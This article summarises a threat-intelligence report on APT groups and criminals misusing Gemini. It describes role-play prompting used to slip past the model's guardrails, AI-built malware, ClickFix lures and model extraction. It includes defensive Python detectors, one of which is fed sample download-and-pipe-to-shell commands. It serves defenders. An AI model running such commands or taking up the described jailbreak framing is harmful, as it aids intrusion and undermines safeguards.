The integration of large language models (LLMs) into the cyber threat landscape has moved from theoretical concern to documented reality, according to recent findings from Google's Threat Intelligence Group (GTIG). The report indicates that state-backed advanced persistent threat (APT) groups are not merely experimenting with generative AI but are systematically using Google's Gemini model across every phase of their operations to speed up and refine their attacks. This adoption spans initial reconnaissance and target profiling, continues through exploitation and payload development, and extends into post-compromise activity, signaling a significant maturation in adversary tooling.



The range of threat actors abusing Gemini is broad and includes established, well-resourced groups from several geopolitical spheres. Groups attributed to China (APT31 and Temp.HEX), Iran (APT42), and North Korea (UNC2970), along with Russian actors, have all been documented using the model. Their uses range from generating convincing, context-aware phishing lures, a cornerstone of initial access, to coding assistance, vulnerability testing, and real-time troubleshooting during active intrusions. This breadth suggests that adversaries treat advanced AI not as a niche tool but as a force multiplier across their entire offensive repertoire. Financially motivated cybercriminals are also showing growing interest in AI services to scale social engineering, as illustrated by the rise of ClickFix campaigns.

The Technical Depth of AI-Augmented Attacks

The GTIG report details how these adversaries use Gemini's capabilities. In effect, the model serves as an on-demand consultant for offensive operations. One common technique is role-play prompting, in which the adversary instructs Gemini to adopt the persona of an expert cybersecurity professional. Framing malicious requests as theoretical or defensive research in this way is intended to help threat actors circumvent the model's safety guardrails.

For instance, Chinese threat actors were observed fabricating detailed engagement scenarios built around specialized tooling such as Hexstrike MCP. They directed the model to analyze potential attack vectors, including Remote Code Execution (RCE) vulnerabilities, techniques for bypassing Web Application Firewalls (WAFs), and the results of SQL injection attempts against specific, high-value U.S. infrastructure. This indicates a shift from generic queries to targeted exploit development supported by AI analysis. Another recurring pattern among Chinese-aligned actors is using Gemini for iterative code refinement, research synthesis, and technical advice aimed at deepening their intrusions and making them stealthier.

The Iranian group APT42 has focused its use of AI on improving social engineering and accelerating development. Using Gemini as a rapid prototyping platform, the group has cut the time needed to debug code, generate boilerplate malicious components, and research obscure exploitation techniques that would otherwise require extensive manual penetration testing or library review.



AI integration also extends into malware development. Observed abuse includes adding new capabilities to malware such as the CoinBait phishing kit and the HonestCue downloader. GTIG cautions that these applications have not yet produced paradigm-shifting "breakthroughs" in offensive capability, but the consistent pattern points to a steady trend toward AI integration that malware operators will continue to pursue.

HonestCue, a proof-of-concept framework first identified in late 2025, illustrates this trend. It calls the Gemini API directly to generate C# code for second-stage payloads at runtime. The generated code is then compiled and executed in memory, a fileless technique intended to evade endpoint detection that focuses on disk-based artifacts.
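
Because HonestCue fetches its second stage from the Gemini API at runtime, one possible defensive signal is an unexpected process contacting that API. The sketch below filters hypothetical endpoint connection events for the Gemini API hostname, assumed here to be `generativelanguage.googleapis.com`, and reports any process that is not on an allowlist. The `ConnectionEvent` type, the allowlist, and the single-host list are illustrative assumptions, not details from GTIG's report.

```python
from dataclasses import dataclass
from typing import Iterable, List, Set

# Assumed Gemini API hostname; a real deployment may need to track other AI endpoints too.
GEMINI_API_HOSTS: Set[str] = {"generativelanguage.googleapis.com"}


@dataclass(frozen=True)
class ConnectionEvent:
    """Hypothetical outbound-connection record from an endpoint agent."""

    process: str  # executable name of the connecting process
    host: str     # destination hostname (for example, from DNS or TLS SNI)


def unexpected_llm_callers(
    events: Iterable[ConnectionEvent], allowlist: Set[str]
) -> List[ConnectionEvent]:
    """Return events where a process outside the allowlist contacted the Gemini API."""
    return [
        event
        for event in events
        # Normalize case and any trailing dot before comparing hostnames.
        if event.host.lower().rstrip(".") in GEMINI_API_HOSTS
        and event.process not in allowlist
    ]


if __name__ == "__main__":
    sample = [
        ConnectionEvent("chrome.exe", "generativelanguage.googleapis.com"),
        ConnectionEvent("invoice_viewer.exe", "generativelanguage.googleapis.com"),
        ConnectionEvent("invoice_viewer.exe", "example.com"),
    ]
    for hit in unexpected_llm_callers(sample, allowlist={"chrome.exe"}):
        print(hit)
```

Malware could relay its requests through another host, so a check like this would be one weak signal among many rather than a reliable detection on its own.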

The CoinBait phishing kit, which poses as a legitimate cryptocurrency exchange interface and harvests credentials through a React single-page application (SPA) wrapper, also bears the hallmarks of LLM assistance. Researchers noted logging messages prefixed with "Analytics:", which suggests the use of AI code-generation tools that inadvertently left behind development metadata. Further analysis of the kit's structure pointed to the Lovable AI platform: the source code includes the Lovable Supabase client and references to lovable.app, a clear fingerprint of AI-assisted development.
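
The artifacts described above lend themselves to simple static matching. The sketch below scans a JavaScript bundle for three hypothetical indicators modeled on them: string literals starting with "Analytics:", references to `lovable.app`, and a Supabase project URL (assumed here to accompany the bundled Supabase client). The pattern names and the two-hit threshold are illustrative assumptions, not published detection logic.

```python
import re
from typing import Dict, List

# Hypothetical indicator patterns modeled on the CoinBait artifacts; tune against real samples.
INDICATORS: Dict[str, re.Pattern] = {
    # A quoted string literal that starts with "Analytics:" (e.g. a log message).
    "analytics_log_prefix": re.compile(r"""["'`]Analytics:"""),
    # Any reference to the lovable.app domain.
    "lovable_domain": re.compile(r"\blovable\.app\b", re.IGNORECASE),
    # A Supabase project URL, assumed to appear alongside the Supabase client.
    "supabase_project_url": re.compile(r"\b[a-z0-9]+\.supabase\.co\b", re.IGNORECASE),
}


def scan_bundle(source: str) -> List[str]:
    """Return the names of all indicators that match somewhere in the bundle text."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(source)]


def looks_ai_generated(source: str, min_hits: int = 2) -> bool:
    """Flag a bundle when at least `min_hits` distinct indicators match (hypothetical threshold)."""
    return len(scan_bundle(source)) >= min_hits


if __name__ == "__main__":
    bundle = (
        'console.log("Analytics: page view");'
        'const c=createClient("https://abcd1234.supabase.co",k);'
        'fetch("https://demo.lovable.app/api");'
    )
    print(scan_bundle(bundle), looks_ai_generated(bundle))
```

Lovable and Supabase are legitimate platforms, so these matches only indicate AI-assisted development, not malice; they would need to be combined with other phishing indicators.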

The scope of misuse is also expanding beyond traditional intrusion sets into high-volume, low-effort social engineering. Cybercriminals are using generative AI services to fuel ClickFix campaigns, which place malicious advertisements prominently in search engine results for technical troubleshooting queries. Victims who click these ads while seeking help (for example, with printer errors or software crashes) are instructed to run malicious commands themselves. These commands often deliver information stealers such as AMOS, which targets macOS. The AI component helps attackers produce the volume of convincing, contextually relevant ad copy needed to trick a wide user base into running the code.
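
Because ClickFix relies on the victim pasting a command, one defensive option is to inspect commands before they run. The sketch below applies two hypothetical heuristics for a common shape of such one-liners: content downloaded with `curl` or `wget`, or decoded with `base64`, and piped straight into a shell. These patterns are assumptions for illustration, not indicators from the report, and some legitimate installers use the same shape.

```python
import re
from typing import Dict, List

# Hypothetical heuristics: fetch or decode content, then pipe it into sh, bash, or zsh.
SHELL_PIPE = r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"

SUSPICIOUS_PATTERNS: Dict[str, re.Pattern] = {
    # e.g. curl -fsSL https://host/script | bash
    "download_piped_to_shell": re.compile(r"\b(?:curl|wget)\b[^|;]*" + SHELL_PIPE),
    # e.g. echo <payload> | base64 -d | zsh  (macOS base64 also accepts -D)
    "base64_piped_to_shell": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*" + SHELL_PIPE),
}


def flag_command(command: str) -> List[str]:
    """Return the names of heuristics matched by a command a user was told to paste."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(command)]


if __name__ == "__main__":
    for cmd in (
        "curl -fsSL https://example.com/install.sh | bash",
        'echo "ZWNobyBoaQ==" | base64 -d | zsh',
        "ls -la ~/Downloads",
    ):
        print(cmd, "->", flag_command(cmd))
```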

The Intellectual Property Crisis: Model Extraction and Knowledge Distillation

Beyond direct operational assistance, the report highlights a more insidious, structural threat to the AI ecosystem: model extraction and knowledge distillation. These techniques target the proprietary value of the LLMs themselves, rather than just their output.

Adversaries, often using accounts with authorized API access, systematically query Gemini with extensive, methodical sets of prompts. The goal is not to generate a single malicious artifact but to approximate the model's reasoning and functional behavior from the outside. By collecting these input/output pairs across a wide range of tasks, including non-English queries, attackers aim to build a functionally similar, if likely less capable, clone of the original model.

This extraction is often paired with knowledge distillation, a machine learning technique in which a smaller custom model (the "student") is trained to mimic the outputs and behavior of a larger, proprietary model (the "teacher"). As GTIG researchers emphasize, "Model extraction and subsequent knowledge distillation enable an attacker to accelerate AI model development quickly and at a significantly lower cost."
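
To make the student/teacher relationship concrete, the sketch below computes the classic soft-target distillation loss described by Hinton, Vinyals, and Dean (2015): the KL divergence between the teacher's and the student's temperature-softened output distributions, scaled by the squared temperature. This formulation assumes access to the teacher's logits, which an API user typically does not have; when only generated text is available, the student is usually fine-tuned on the teacher's responses instead, which is equivalent to using the teacher's chosen tokens as one-hot targets. The function names and the default temperature are illustrative.

```python
import math
from typing import List, Sequence


def softmax(logits: Sequence[float], temperature: float = 1.0) -> List[float]:
    """Temperature-scaled softmax; higher temperatures give softer distributions."""
    scaled = [x / temperature for x in logits]
    peak = max(scaled)  # subtract the maximum for numerical stability
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def distillation_loss(
    teacher_logits: Sequence[float],
    student_logits: Sequence[float],
    temperature: float = 2.0,
) -> float:
    """KL(teacher || student) on softened distributions, multiplied by T^2."""
    p = softmax(teacher_logits, temperature)  # soft targets from the teacher
    q = softmax(student_logits, temperature)  # student's softened predictions
    kl = sum(pi * math.log(pi / qi) for pi, qi in zip(p, q) if pi > 0)
    # The T^2 factor keeps gradient magnitudes comparable across temperatures.
    return kl * temperature ** 2


if __name__ == "__main__":
    teacher = [1.0, 2.0, 3.0]
    print(distillation_loss(teacher, [1.0, 2.0, 2.5]))  # student close to the teacher
    print(distillation_loss(teacher, [3.0, 2.0, 1.0]))  # student far from the teacher
```

Minimizing this loss over many teacher outputs pushes the student toward the teacher's behavior, which is why a large corpus of collected responses is valuable to an attacker.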

While this activity does not directly endanger end-user data, Google flags it as a severe threat. It amounts to intellectual property theft on an industrial scale and undermines the core business model of AI-as-a-Service providers, which invest billions in training foundation models. The ability to clone powerful AI capabilities rapidly could also widen access to advanced offensive tooling and increase the volume and complexity of future cyberattacks, which would ultimately affect end users. In one documented extraction attempt, Gemini was subjected to approximately 100,000 carefully constructed prompts designed to probe and replicate its reasoning across diverse operational tasks.
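
On the provider side, a very simple first signal for systematic querying is per-account volume over a sliding time window, since a campaign on the scale of 100,000 prompts is likely to produce unusual usage patterns. The sketch below is a hypothetical monitor; the window length and threshold are placeholder values rather than figures from the report, and a production system would combine volume with content signals such as templated or near-duplicate prompts.

```python
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Deque, Dict


@dataclass
class ExtractionMonitor:
    """Hypothetical per-account sliding-window counter for high-volume querying."""

    window_seconds: float = 3600.0  # placeholder window length
    max_queries: int = 1000         # placeholder threshold per window
    _events: Dict[str, Deque[float]] = field(
        default_factory=lambda: defaultdict(deque), init=False, repr=False
    )

    def record(self, account: str, timestamp: float) -> bool:
        """Log one query and return True if the account now exceeds the threshold.

        Assumes timestamps arrive in non-decreasing order for each account.
        """
        events = self._events[account]
        events.append(timestamp)
        # Evict queries that have fallen out of the sliding window.
        while events and events[0] <= timestamp - self.window_seconds:
            events.popleft()
        return len(events) > self.max_queries


if __name__ == "__main__":
    monitor = ExtractionMonitor(window_seconds=10, max_queries=3)
    for t in (0, 1, 2, 3):
        print(t, monitor.record("acct-123", t))
```

Volume thresholds alone are easy to evade by spreading queries across accounts, which is one reason the report's emphasis on classifier improvements matters.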

Industry Implications and Expert Analysis

These findings call for a reassessment of security assumptions across the technology sector. For cloud providers and LLM developers, the focus must expand from preventing harmful outputs (content filtering) to protecting the model's learned capabilities themselves. Relying on API access controls as the primary safeguard is proving insufficient against persistent, state-sponsored adversaries that probe models in a structured, systematic way.

The "AI-augmented adversary" is no longer hypothetical. The concern is not that AI creates zero-day vulnerabilities; it is that AI can drastically reduce the time, cost, and expertise an existing threat actor needs to operationalize known weaknesses or produce common attack components such as social engineering text or polymorphic malware code. This compression of the attack development timeline may be the most significant long-term implication: attacks that once required a team of experienced developers and researchers can now be prototyped or executed by smaller, less-resourced cells.

For defenders, the markers left by AI usage, such as the "Analytics:" prefixes in CoinBait, offer a potential but fleeting advantage. Defenders need to build detection, including AI-driven anomaly detection, that recognizes these artifacts quickly, because once an artifact is publicly documented, adversaries will iterate to obscure it.

The Future Trajectory: Defenses and Escalation

Google has responded to the documented abuse by taking immediate action against identified accounts and infrastructure linked to malicious prompting. The company is also improving Gemini's internal classifiers to make systematic abuse harder to carry out. Google says it remains committed to building AI systems with "robust security measures and strong safety guardrails," backed by continuous security testing.

However, the arms race is set to intensify. The next phase of this conflict will likely involve adversaries deploying their own custom-trained, distilled models: clones of Gemini or other LLMs that are optimized for offensive tasks and free of the ethical guardrails imposed by commercial providers. Defensive security teams would then be facing AI-generated tools that operate outside the public safety net.

The industry must anticipate a trend toward AI-native defensive measures. Automated response systems, SOAR platforms, and endpoint detection and response (EDR) solutions will increasingly rely on proprietary AI trained on threat intelligence to detect the subtle, generative patterns indicative of LLM assistance in malware execution or network communication. Ultimately, the effective mitigation of threats leveraging tools like Gemini will depend on a proactive, defense-in-depth strategy that secures not only the perimeter but also the integrity and intellectual property of the very models powering modern digital infrastructure.